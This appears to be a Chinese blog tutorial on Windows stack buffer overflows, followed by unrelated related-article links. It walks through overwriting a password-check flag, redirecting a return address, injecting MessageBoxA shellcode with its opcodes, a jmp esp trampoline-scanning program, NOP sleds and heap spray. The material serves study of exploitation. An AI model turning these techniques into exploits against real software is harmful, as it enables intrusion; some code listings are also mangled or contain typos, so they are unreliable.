ESP:该指针永远指向系统栈最上面一个栈帧的栈顶
 EBP:该指针永远指向系统栈最上面一个栈帧的底部
01  修改函数返回地址
  1. #include<stdio.h>
    2. 

  2. #include<string.h>
    3. 

  3. #define PASSWORD "1234567"
    4. 

  4. int verify_password (char *password)
    5. 

  5. {
    6. 

  6.  int authenticated;
    7. 

  7.   char buffer[8];
    8. 

  8.    authenticated=strcmp(password,PASSWORD);
    9. 

  9.     strcpy(buffer,password);
    10. 

  10.   return authenticated;
    11. 

  11. }
    12. 

  12. int main()
    13. 

  13. {
    14. 

  14.   int valid_flag=0;
    15. 

  15.  char password[1024];
    16. 

  16.   while(1)
    17. 

  17.    {
    18. 

  18.      printf("please input password:");
    19. 

  19.        scanf("%s",password);
    20. 

  20.      valid_flag = verify_password(password);
    21. 

  21.        if(valid_flag)
    22. 

  22.      {
    23. 

  23.          printf("incorrenct\n");
    24. 

  24.      }
    25. 

  25.      else{
    26. 

  26.             printf("Congratulation\n");
    27. 

  27.          break;
    28. 

  28.        }
    29. 

  29.  }
    30. 

  30.  return 0;
    31. 

  31. }
输入8个字符后结尾的NULL会覆盖authenticated

02  控制函数执行流程
  1. #include<stdio.h>
    2. 

  2. #include<string.h>
    3. 

  3. #define PASSWORD "1234567"
    4. 

  4. int verify_password (char *password)
    5. 

  5. {
    6. 

  6.    int authenticated;
    7. 

  7.   char buffer[8];
    8. 

  8.     printf("%p\n",&buffer);
    9. 

  9.    authenticated=strcmp(password,PASSWORD);
    10. 

  10.     strcpy(buffer,password);
    11. 

  11.   return authenticated;
    12. 

  12. }
    13. 

  13. int main()
    14. 

  14. {
    15. 

  15.   int valid_flag=0;
    16. 

  16.  char password[1024];
    17. 

  17.   FILE *fp;
    18. 

  18.  if(!(fp=fopen("password.txt","rw+"))){
    19. 

  19.        exit(0);
    20. 

  20.     }
    21. 

  21.  fscanf(fp,"%s",password);
    22. 

  22.     valid_flag = verify_password(password);
    23. 

  23.   if(valid_flag)
    24. 

  24.  {
    25. 

  25.      printf("incorrenct password!\n");
    26. 

  26.    }
    27. 

  27.  else{
    28. 

  28.         printf("Congratulation\n");
    29. 

  29.  }
    30. 

  30.  fclose(fp);
    31. 

  31.  
    32. 

  32.    return 0;
    33. 

  33. }
(1) 摸清楚栈中的状况,函数地址距离缓冲区的偏移量
      
    通过字符串搜索得到返回地址0x00401122
(2) 要得到程序中密码验证通过的指令地址,以便程序直接跳去这个分支执行
    需要逆序输入4个字节
    
(3) 要在password.txt文件的相应偏移处填上这个地址
    
    由于栈内EBP等被覆盖为无效值,使得程序在退出时堆栈无法平衡

03 向进程中植入代码
    1、Depends找到user32.dll基址 MessageBoxA偏移地址
        
     2、在汇编语言中调用这个函数需要获得这个函数的入口地址       
机器码     汇编     注释    
33DB     XOR EBX, EBX 压如NULL结尾的“failwest”字符串
53 PUSH EBX 之所以用EBX清零后入栈作为字符串的
6877657374 PUSH 6877657374 截断符,是为了避免“PUSH 0”中的NULL
686661696C PUSH 686661696C 否则植入的机器码会被strcpy函数截断
8BC4     MOV EAX, ESP EAX里是字符串指针    
53 PUSH EBX 4个参数按从右向左的顺序入栈    
50 PUSH EAX 分别是(0,failwest,failwest,0)
50 PUSH EAX
53 PUSH EBX
B8EA07D577    MOV EAX, 0x77D507EA  调用MessageBoxA  不同的机器这里的函数入口 
FFD0 CALL EAX 地址不同

基地址+偏移地址 = MessageBoxA在内存中的入口地址

    90后面填入buffer地址
    成功通过溢出调用了MessageBoxA
    
    ESP所指的位置恰好是我们所淹没的返回地址的下一个位置
   
 
**04  获取 “跳板” 的地址
    这种定位shellcode方法使进程空间里一条 jmp esp 指令作为跳板,不论栈帧怎么移位,都能跳回栈区
    获得 user32.dll 内跳转指令地址最直观的方法就是编程搜索内存
     
  1. #include<Windows.h>
    2. 

  2. #include<stdio.h>
    3. 

  3. #define DLL_NAME "user32.dll"
    4. 

  4. int main()
    5. 

  5. {
    6. 

  6.     BYTE* ptr;
    7. 

  7.   int position,address;
    8. 

  8.  HINSTANCE handle;
    9. 

  9.  BOOL done_flag = FALSE;
    10. 

  10.  handle = LoadLibrary(DLL_NAME);
    11. 

  11.   if(!handle)
    12. 

  12.     {
    13. 

  13.      printf(" load dll erro !");
    14. 

  14.      exit(0);
    15. 

  15.     }
    16. 

  16.  ptr = (BYTE*)handle;
    17. 

    18. 

  18.     for(position = 0; !done_flag; position++)
    19. 

  19.  {
    20. 

  20.      try{
    21. 

  21.          if(ptr[position] == 0xFF && ptr[position+1] == 0xE4)
    22. 

  22.             {
    23. 

  23.              //0xFFE4 is the opcode of jmp esp
    24. 

  24.              int address = (int)ptr + postion;
    25. 

  25.                printf("OPCODE found at 0x%x\n",address);
    26. 

  26.          }
    27. 

  27.      }
    28. 

  28.      catch(...)
    29. 

  29.        {
    30. 

  30.          int address = (int)ptr + position;
    31. 

  31.           printf("END OF 0x%x\n", address);
    32. 

  32.          done_flag = true;
    33. 

  33.       }
    34. 

  34.  }
    35. 

  35.  return 0;
    36. 

  36. }
    还可以用OllyUni.dll插件 http://cracklab.ru/olya/
    添加插件后,在c页面右键出现Overflew Return Address
    
    搜索完后,单击 “L” 可以在日志窗口中查看搜索结果
    为了让程序正常退出,需要用depends查找kernel32.dll中的ExitProcess的地址 
    
    写出shellcode的源代码
  1. #include<Windows.h>
    2. 

  2. int main()
    3. 

  3. {
    4. 

  4.     HINSTANCE LibHandle;
    5. 

  5.   char dllbuf[11] = "user32.dll";
    6. 

  6.   LibHandle = LoadLibrary(dllbuf);
    7. 

  7.    _asm{
    8. 

  8.      sub  sp, 0x440
    9. 

  9.       xor  ebx, ebx
    10. 

  10.         push ebx //cut string
    11. 

  11.      push 0x74736577
    12. 

  12.         push 0x6C696166
    13. 

    14. 

  14.       mov  eax, esp
    15. 

  15.         push ebx
    16. 

  16.        push eax
    17. 

  17.        push eax
    18. 

  18.        push ebx
    19. 

    20. 

  20.        mov  eax, 0x77D507EA  
    21. 

  21.      call eax  //call MessageBoxA
    22. 

  22.         
    23. 

  23.      push ebx
    24. 

  24.        mov  eax, 0x7C81CAFA
    25. 

  25.         call eax  //call exit(0)
    26. 

  26.   }
    27. 

  27. }
    编译后在OD中打开,找到代码后dump:右键复制->到文件
    
     
    2. 

  2.  33DB          xor ebx,ebx                  
    3. 

  3.  53            push ebx
    4. 

  4.  68 77657374   push 0x74736577
    5. 

  5.  68 6661696C   push 0x6C696166
    6. 

  6.  8BC4          mov eax,esp
    7. 

  7.  53            push ebx
    8. 

  8.  50            push eax
    9. 

  9.  50            push eax
    10. 

  10.  53            push ebx
    11. 

  11.  B8 EA07D577   mov eax,user32.MessageBoxA
    12. 

  12.  FFD0          call eax
    13. 

  13.  53            push ebx                                 
    14. 

  14.  B8 FACA817C   mov eax,kernel32.ExitProcess             
    15. 

  15.  FFD0          call eax

    
    在shellcode前加上jmp esp的地址
    
05  地址错位
    为了通用性,我们通常会在shellcode一开始就大范围抬高栈顶,从而达到保护自身安全的目的
    mov eax,esp 和 jmp eax 也可以完成进入栈区的功能
    扩大shellcode面积,提高命中率(函数返回时,只要能击中nop区shellcode就能执行)
    大面积“扫射”返回地址(用一大片返回地址来覆盖真正的返回地址,增加命中的成功率)
    解决字节错位:不同的主机会有不同的安装目录,可能导致覆盖的地址错位失效,使用按字节相同的双字节跳转地址,甚至可以使用堆中的地址,然后想办法将shellcode用堆扩展的办法放置在响应的区域,这种heap spray的办法经常在IE漏洞中使用

栈溢出原理与 shellcode 开发的更多相关文章

  1. OAuth的机制原理讲解及开发流程

    本想前段时间就把自己通过QQ OAuth1.0.OAuth2.0协议进行验证而实现QQ登录的心得及Demo实例分享给大家,可一直很忙,今天抽点时间说下OAuth1.0协议原理,及讲解下QQ对于Oaut ...

  2. Windows栈溢出原理

    1.栈是什么? 栈是一种运算受限的线性表 其限制是仅允许在表的一端进行插入和删除运算 这一端称为栈顶(TOP),相对的另一端称为栈底(BASE) 向一个栈插入新元素,称作进栈.入栈或压栈(PUSH) ...

  3. Zookeeper原理和实战开发经典视频教程 百度云网盘下载

    Zookeeper原理和实战开发 经典视频教程 百度云网盘下载 资源下载地址:http://pan.baidu.com/s/1o7ZjPeM   密码:r5yf   

  4. Shellcode开发辅助工具shellnoob

    Shellcode开发辅助工具shellnoob   Shellcode开发的过程中会遇到很多繁杂的工作,如编译.反编译.调试等.为了减少这部分工作,Kali Linux提供了开发辅助工具shelln ...

  5. VR原理讲解及开发入门

    本文是作者obuil根据多年心得专门为想要入门的VR开发者所写,由52VR网站提供支持.   1. VR沉浸感和交互作用产生的原理:   在之前,我们观看一个虚拟的创造内容是通过平面显示器的,52VR ...

  6. [转]VR原理讲解及开发入门

    本文转自:http://www.52vr.com/article-661-1.html 本文是作者obuil根据多年心得专门为想要入门的VR开发者所写,由52VR网站提供支持.   1. VR沉浸感和 ...

  7. springboot深入学习(二)-----profile配置、运行原理、web开发

    一.profile配置 通常企业级应用都会区分开发环境.测试环境以及生产环境等等.spring提供了全局profile配置的方式,使得在不同环境下使用不同的applicaiton.properties ...

  8. OAuth的机制原理讲解及开发流程(转)

    1.OAuth的简述 OAuth(Open Authorization,开放授权)是为用户资源的授权定义了一个安全.开放及简单的标准,第三方无需知道用户的账号及密码,就可获取到用户的授权信息,并且这是 ...

  9. 【转载】OAuth的机制原理讲解及开发流程

    1.OAuth的简述 OAuth(Open Authorization,开放授权)是为用户资源的授权定义了一个安全.开放及简单的标准,第三方无需知道用户的账号及密码,就可获取到用户的授权信息,并且这是 ...

随机推荐

  1. bzoj3876: [Ahoi2014&Jsoi2014]支线剧情

    题意:给一幅图,从1开始,每条边有边权最少走一遍,可以在任意点退出,问最小花费 题解:上下界费用流,每个边都流一遍,然后为了保证流量平衡,新建源点汇点,跑费用流把流量平衡 /************* ...

  2. Leetcode 5016. 删除最外层的括号

    5016. 删除最外层的括号  显示英文描述 我的提交返回竞赛   用户通过次数446 用户尝试次数469 通过次数456 提交次数577 题目难度Easy 有效括号字符串为空 ("&quo ...

  3. 函数使用十一:FTP

    网上很多FTP说明的文档,也很详细,写这玩意是备份一下: 注:有的系统需要配置FTP地址和端口,有的好像没有... SM30->SAPFTP_SERVERS_V,默认端口21. 在做之前可以做个 ...

  4. 理解javascript封装

    封装可以被定义为对对象的内部数据表现形式和实现细节进行隐藏.通过封装可以强制实施信息隐藏. 在JavaScript中,并没有显示的声明私有成员的关键字等.所以要想实现封装/信息隐藏就需要从另外的思路出 ...

  5. 再谈数据库优化(database tuning)的真谛和误区

    当今各行业信息量呈现爆炸式增长,因此,数据库优化也就显得弥足重要.随着数据库性能问题的出现,每位用户为了解决出现的问题,不得不满网上到处搜索优化的”灵丹妙药“和捷径,于是,就出现了各种各样的条条框框和 ...

  6. Linux几种服务用处介绍

    rexec--Remote Execute,远程命令执行,允许远程机器在本机上远程执行命令,监听端口512. nfs--Network File System,网络文件系统,用于将本机文件夹共享到别的 ...

  7. [转]java异常中Exception捕获不到的异常

    一 概念 众所周知java提供了丰富的异常类,这些异常类之间有严格的集成关系,分类为 父类Throwable Throwable的两个子类Error和Exception Exception的两个子类C ...

  8. QT和JS的互相调用例子

    转自: http://blog.163.com/qimo601@126/blog/static/15822093201682185819623/ Qt 4.8.4 感谢原作者,我只转载. 看看作者如何 ...

  9. PAT-GPLT训练集 L1-043 阅览室

    PAT-GPLT训练集 L1-043 阅览室 注意:连续的S和E才算一次借还 代码: #include<iostream> #include<cstdio> using nam ...

  10. Daily record-July

    July11. Nonsense! 胡说八道!2. Who cares! 谁管你呀!3. It's on me.. 我来付.4. It's a deal. 一言为定.5. I've done my b ...